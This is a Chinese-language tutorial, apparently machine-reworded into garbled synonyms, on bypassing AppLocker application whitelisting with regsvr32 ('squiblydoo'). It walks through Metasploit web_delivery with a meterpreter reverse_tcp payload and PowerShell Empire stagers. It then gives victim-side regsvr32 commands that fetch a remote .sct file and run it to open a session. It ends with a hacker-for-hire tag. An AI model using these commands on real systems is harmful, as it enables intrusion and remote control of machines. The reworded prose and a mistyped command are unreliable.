在大型安排的安全领域中，AppLocker正在扮演越来越重要的人物。运用AppLocker规矩可以明显下降企业的安全危险，AppLocker规矩可以运用于方针运用，这些规矩也是构成AppLocker战略的根本组件。 AppLocker规矩介绍 规矩调集（Rule Collection） AppLocker控制台以规矩调集作为安排单元，这些调集包括可履行文件、脚本、Windows安装文件、封装的运用和运用安装包以及DLL文件。这些规矩可以让咱们轻松区分隔不同类型的运用。 规矩条件（Rule Condition） 规矩条件可以帮忙AppLocker辨认哪些运用对应哪些规矩。三个首要的规矩条件分别为运用发布者、途径以及文件哈希。 文件途径条件 以运用在体系中的途径作为辨认根据； 文件发布者条件 以运用的特点或许数字签名作为辨认根据； 文件哈希条件 以运用的哈希值作为辨认根据； 看似这些强壮的规矩让黑客进犯无处遁形，但不幸的是，关于防御者来说，除了默许规矩以外，AppLocker还涉及到许多自定义装备，而黑客正是运用这些装备作为突破口的。本文将介绍经过 regsrv32.exe绕过Applocker运用程序白名单的多种办法。 Regsvr32介绍 Regsvr32全称是Microsoft Register Server。它是windows的指令行实用工具。尽管regsvr32有时会引起一些不可思议的问题，但作为Windows体系文件，它仍是一个重要的文件。该文件坐落C:Windows的子文件夹中，该文件可以调查、盯梢和影响其他程序。由于它是.exe格局，所以首要被用于在Windows文件扩展名中注册和刊出程序，它的进程可以广泛地帮忙OLE（方针链接和嵌入），DLL（数据链接库）和OCX（ActiveX控件模块）。上述流程在后台作业，可以经过使命管理器查看。停止，它是微软最受信赖的文件之一。 regsvr32作业原理 当你在regsvr32中注册DLL文件时，与regsvr32相关的程序的信息将添加到Windows中。然后拜访这些信息，以了解程序数据的方位以及怎么与程序数据进行交互。在注册DLL文件时，信息会被添加到目录的中心，以便windows可以运用它。这些文件的整个途径都有可履行代码，由于这些文件，windows可以调用特定的函数。这些文件十分便利，当软件更新时，这些文件会主动调用更新后的版别。简而言之，它有助于防止软件的版别问题。一般，除了注册和刊出DLL文件外，一般不运用此文件。 RegSvr32.exe具有以下指令行选项： 语法：Regsvr32 [/s][/u] [/n] [/i[:cmdline]] · /u：刊出服务器； · /i：调用DllInstall传递一个可选的[cmdline]，当它与/u一同运用时，它会调用dll uninstall。 · /n：不要调用DllRegisterServer，此选项有必要与/i一同运用 · / s ：缄默沉静，不显现音讯框； 要了解更多信息，请拜访这儿。 Web传递(Web Delivery) 此模块会快速发动一个供给有效载荷的web服务器，所供给的指令将答应下载和履行有效载荷。它将经过指定的脚本语言解说器或经过regsvr32.exe的“squiblydoo”来绕过运用程序白名单。该模块的首要意图是当进犯者不得不手动输入指令时，在方针设备上快速树立会话，例如指令注入。 Regsvr32运用“squiblydoo”技能来绕过运用程序白名单，签名的Microsoft二进制文件Regsvr32可以恳求.sct文件，然后在其间履行包括的PowerShell指令。两个web恳求(即， .sct文件和PowerShell下载或履行)都可以发生在同一个端口上。PSH（Binary）”会将文件写入磁盘，答应自定义二进制文件被下载或履行。 use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 3 msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set srvhost 192.168.1.109 msf exploit (web_delivery)>exploit 一旦运用这些文本开端运转缝隙，你将具有一个为自定义的URL，就可以在受害者电脑的指令提示符中运转该URL。 regsvr32 /s /n /u /i://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll 在指令履行后按回车键，就将进行会话。输入“sysinfo”以获取方针电脑的信息。 PowerShell Empire Empire是一款相似Metasploit的浸透测验结构，根据python编写，Empire是一个朴实的PowerShell后开发署理，树立在暗码安全通讯和灵敏的架构上。Empire完成了无需powershell.exe即可运转PowerShell署理的功用，从键盘记录器到Mimikatz等快速布置的后期开发模块，以及适应性通讯以避开 *** 检测，所有这些都包括在以可用性为要点的结构中。 在PowerShell Empire办法中，咱们有必要将.sct tacks与Metasploit配对，可是在这种办法中，咱们将运用Empire结构。它彻底根据python的PowerShell windows署理，这使得它十分有用。 如下所示，发动Empire结构后，输入listener指令，以查看是否存在反侦办进程。 uselistner http set Host //192.168.1.109 execute 运用上述指令，你将具有一个反侦办进程。输入back指令，就可以退出反侦办进程，以便发动PowerShell。 一旦你退出listener指令，就需要运用一个缝隙来创立歹意文件。在Empire中，stage代表一段代码，它答应咱们的歹意代码经过受感染的主机上的署理运转。这意味着要创立一个缝隙，咱们将不得不经过usestager。指令如下： usestager windows/launcher_sct set listener http execute 履行指令后，usestager将在/ tmp中创立一个launcher.sct。现在要取得会话，就有必要经过输入以下内容来发动python服务器： python -m SimpleHTTPServer 8080 当服务器发动时，剩余的仅有过程就是在受害者的电脑中履行咱们的歹意软件。此刻，就要在指令提示符中输入以下指令： regsvr / s / n / u /i://192.168.1.109:8080/tmp/launcher.sct scrobj.dll 在上面的指令中，咱们运用了端口8080，这是由于咱们的python服务器在同一个端口上被激活。 履行上述操作后，你将收到一个会话：[1][2][3]黑客接单网